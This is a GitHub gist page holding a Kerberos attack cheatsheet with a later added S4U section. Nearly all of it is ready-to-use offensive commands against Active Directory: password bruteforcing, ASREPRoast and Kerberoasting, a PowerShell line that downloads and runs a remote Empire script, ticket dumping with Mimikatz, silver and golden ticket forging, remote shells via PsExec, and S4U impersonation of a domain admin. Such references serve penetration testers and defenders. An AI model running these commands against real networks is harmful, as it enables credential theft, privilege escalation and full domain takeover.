Forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
Last active
March 11, 2022 06:28
-
-
Save knethteo/2fc8af6ea28199fd63a529a73a4176c7 to your computer and use it in GitHub Desktop.
Revisions
-
knethteo revised this gist
Jun 5, 2020 . 1 changed file with 11 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -266,6 +266,17 @@ Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en- .\PsExec.exe -accepteula \\<remote_hostname> cmd ``` ## S4UPwanage Get the tgt from the account with constrained delegation enabled to access a service ```shell .\Rubeus.exe asktgt /user:svc.sqlservice /domain:alsid.corp /password:Passw0rd ``` Reuse the ticket and escalate privilege using s4u exploit ```shell .\Rubeus.exe s4u /ticker:base /impersonateuser:dcadmin /msdsspn:ldap/dc-vm.alsid.corm /altservice:cifs /ptt ``` ## Misc To get NTLM from password: -
TarlogicSecurity created this gist
May 14, 2019 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,285 @@ # Kerberos cheatsheet ## Bruteforcing With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute): ```shell python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file> ``` With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: ```shell # with a list of users .\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file> # check passwords for all users in current domain .\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file> ``` ## ASREPRoast With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py: ```shell # check ASREPRoast for all domain users (credentials required) python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> # check ASREPRoast for a list of users (no credentials required) python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file> ``` With [Rubeus](https://github.com/GhostPack/Rubeus): ```shell # check ASREPRoast for all users in current domain .\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file> ``` Cracking with dictionary of passwords: ```shell hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file> john --wordlist=<passwords_file> <AS_REP_responses_file> ``` ## Kerberoasting With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py: ```shell python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> ``` With [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe kerberoast /outfile:<output_TGSs_file> ``` With **Powershell**: ``` iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file> ``` Cracking with dictionary of passwords: ```shell hashcat -m 13100 --force <TGSs_file> <passwords_file> john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file> ``` ## Overpass The Hash/Pass The Key (PTK) By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # Request the TGT with hash python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash> # Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft) python getTGT.py <domain_name>/<user_name> -aesKey <aes_key> # Request the TGT with password python getTGT.py <domain_name>/<user_name>:[password] # If not provided, password is asked # Set the TGT for impacket use export KRB5CCNAME=<TGT_ccache_file> # Execute remote commands with any of the following by using the TGT python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass ``` With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell # Ask and inject the ticket .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt # Execute a cmd in the remote machine .\PsExec.exe -accepteula \\<remote_hostname> cmd ``` ## Pass The Ticket (PTT) ### Harvest tickets from Linux Check type and location of tickets: ```shell grep default_ccache_name /etc/krb5.conf ``` If none return, default is FILE:/tmp/krb5cc_%{uid}. In case of file tickets, you can copy-paste (if you have permissions) for use them. In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them: ```shell # To dump current user tickets, if root, try to dump them all by injecting in other user processes # to inject, copy tickey in a reachable folder by all users cp tickey /tmp/tickey /tmp/tickey -i ``` ### Harvest tickets from Windows With [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell mimikatz # sekurlsa::tickets /export ``` With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell: ```shell .\Rubeus dump # After dump with Rubeus tickets in base64, to write the in a file [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>")) ``` To convert tickets between Linux/Windows format with [ticket_converter.py](https://github.com/Zer1t0/ticket_converter): ``` python ticket_converter.py ticket.kirbi ticket.ccache python ticket_converter.py ticket.ccache ticket.kirbi ``` ### Using ticket in Linux: With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # Set the ticket for impacket use export KRB5CCNAME=<TGT_ccache_file_path> # Execute remote commands with any of the following by using the TGT python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass ``` ### Using ticket in Windows Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell mimikatz # kerberos::ptt <ticket_kirbi_file> ``` Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe ptt /ticket:<ticket_kirbi_file> ``` Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell .\PsExec.exe -accepteula \\<remote_hostname> cmd ``` ## Silver ticket With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # To generate the TGS with NTLM python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name> # To generate the TGS with AES key python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name> # Set the ticket for impacket use export KRB5CCNAME=<TGS_ccache_file> # Execute remote commands with any of the following by using the TGT python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass ``` With [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell # To generate the TGS with NTLM mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # To generate the TGS with AES 128 key mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # Inject TGS with Mimikatz mimikatz # kerberos::ptt <ticket_kirbi_file> ``` Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe ptt /ticket:<ticket_kirbi_file> ``` Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell .\PsExec.exe -accepteula \\<remote_hostname> cmd ``` ## Golden ticket With [Impacket](https://github.com/SecureAuthCorp/impacket) examples: ```shell # To generate the TGT with NTLM python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name> # To generate the TGT with AES key python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name> # Set the ticket for impacket use export KRB5CCNAME=<TGS_ccache_file> # Execute remote commands with any of the following by using the TGT python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass ``` With [Mimikatz](https://github.com/gentilkiwi/mimikatz): ```shell # To generate the TGT with NTLM mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name> # To generate the TGT with AES 128 key mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> # To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> # Inject TGT with Mimikatz mimikatz # kerberos::ptt <ticket_kirbi_file> ``` Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus): ```shell .\Rubeus.exe ptt /ticket:<ticket_kirbi_file> ``` Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec): ```shell .\PsExec.exe -accepteula \\<remote_hostname> cmd ``` ## Misc To get NTLM from password: ```python python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())' ``` ## Tools * [Impacket](https://github.com/SecureAuthCorp/impacket) * [Mimikatz](https://github.com/gentilkiwi/mimikatz) * [Rubeus](https://github.com/GhostPack/Rubeus) * [Rubeus](https://github.com/Zer1t0/Rubeus) with brute module * [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) * [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute) * [tickey](https://github.com/TarlogicSecurity/tickey) * [ticket_converter.py](https://github.com/Zer1t0/ticket_converter)